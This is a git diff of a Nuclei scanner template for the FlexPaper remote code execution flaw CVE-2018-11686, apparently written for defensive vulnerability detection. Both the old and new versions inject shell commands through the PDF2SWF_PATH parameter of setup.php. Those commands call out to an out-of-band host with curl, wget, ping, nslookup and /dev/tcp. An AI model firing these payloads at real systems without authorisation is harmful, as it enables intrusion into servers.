projectdiscovery · pszyszkowski · Jun 17, 2025 · Jun 17, 2025 · Jun 23, 2025 · Jun 23, 2025
diff --git a/http/cves/2018/CVE-2018-11686.yaml b/http/cves/2018/CVE-2018-11686.yaml
@@ -1,70 +1,46 @@
 id: CVE-2018-11686
 
 info:
-  name: FlexPaper/FlowPaper 2.3.6 - Remote Code Execution
-  author: iamnoooob,pdresearch
+  name: FlexPaper - Remote Code Execution
+  author: mpgn,pszyszkowski
   severity: critical
   description: |
     The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
+  remediation: |
+    Update to version > 2.3.6.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-11686
+    - https://www.exploit-db.com/docs/english/46521-flexpaper-=-2.3.6-remote-code-execution-whitepaper.pdf
+    - https://vulncheck.com/xdb/b67f601a7711
+    - https://github.com/mpgn/CVE-2018-11686
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-11686
     cwe-id: CWE-20
-    cpe: cpe:2.3:a:flowpaper:flowpaper:2.3.6:*:*:*:*:*:*:*
+    epss-score: 0.83572
+    epss-percentile: 0.9922
+    cpe: cpe:2.3:a:flowpaper:flexpaper:*:*:*:*:*:*:*:*
   metadata:
-    verified: true
-    max-request: 3
+    max-request: 1
     vendor: flowpaper
-    product: flowpaper
-    shodan-query: title:"FlexPaper"
+    product: flexpaper
     fofa-query: title="FlexPaper"
-  tags: cve,cve2018,flexpaper,flowpaper,rce,kev
+  tags: cve,cve2018,flexpaper,rce,oast,flowpaper
 
 variables:
-  cmd: "curl oast.pro"
-  cmd_b: "{{base64(cmd)}}"
+  callback: "ping%20-c1%20%7b%7binteractsh-url%7d%7d%20%7c%7c%20nslookup%20%7b%7binteractsh-url%7d%7d%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2f%7b%7binteractsh-url%7d%7d%2f80%20%7c%7c%20curl%20http%3a%2f%2f%7b%7binteractsh-url%7d%7d%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2f%7b%7binteractsh-url%7d%7d%20-O%20%2fdev%2fnull%3b"
 
 http:
-  - raw:
-      - |
-        POST /php/change_config.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        SAVE_CONFIG=1&SWF_Directory=config/
-
-      - |
-        POST /php/change_config.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        SAVE_CONFIG=1&SWF_Directory=config/
-
-    matchers:
-      - type: dsl
-        dsl:
-          - 'contains(header, "index.php?msg=Configuration%20saved!")'
-          - 'status_code == 302 || status_code == 200'
-        condition: and
-        internal: true
-
-  - raw:
-      - |
-        GET /php/setup.php?step=4&PDF2SWF_PATH=echo+{{cmd_b}}+%7C+base64+-d+%7C+sh+%3Econfig/output.txt%3B HTTP/1.1
-        Host: {{Hostname}}
-
-      - |
-        GET /php/config/output.txt HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/php/setup.php?step=4&PDF2SWF_PATH={{callback}}"
 
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body_2, "Interactsh Server")'
-          - 'contains(content_type_2, "text/plain")'
-          - 'contains(location_1, "index.php")'
-        condition: and
-# digest: 4b0a004830460221009126fcbec13f376feb5bc71a466e8e99ea5d697d94e5da3cb5b4c2ca0e097df0022100c9c46730e502cf5086100fe61de727618f223576ed4f8fcf41b097ad21ce3e31:922c64590222798bb761d5b6d8e72950
+          - "contains_any(interactsh_protocol, 'http', 'dns')"
+          - "contains(body, 'FlexPaper')"
+          - "status_code == 200"
+        condition: and